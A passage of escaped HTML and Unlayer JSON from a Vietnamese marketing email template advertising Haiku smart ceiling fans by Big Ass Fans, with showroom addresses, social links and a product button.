<\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px; padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\" alt=\\\"Video\\\" title=\\\"Video\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\" class=\\\"fullwidth\\\" \\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:187px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"187\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #333333; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong><span style=\\\"line-height: 21.6px;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\"noopener\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":14,\\\"u_column\\\":18,\\\"u_content_text\\\":14,\\\"u_content_image\\\":9,\\\"u_content_video\\\":1,\\\"u_content_button\\\":8,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":4},\\\"body\\\":{\\\"id\\\":\\\"ZKEsIo9cyJ\\\",\\\"rows\\\":[{\\\"id\\\":\\\"8v6X8_eWie\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"49F_V6CJYl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Zre8H6uUHc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\",\\\"width\\\":473,\\\"height\\\":282,\\\"maxWidth\\\":\\\"28%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#bfd8d2\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RKHaA3kNjd\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sYJ1ipCk6A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wb89yjmG82\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"80px 10px 15px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"color\\\":\\\"#035b92\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Source Sans Pro\', sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px;\\\\\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HAK8YEjON2\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 30px 80px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#c97a14\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":116,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":430,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gP8etI3XjW\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"IifB1_wM-O\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GiDRLzAilF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"unikoM7yiA\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"h6wnCojqjn\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Ma_hPqa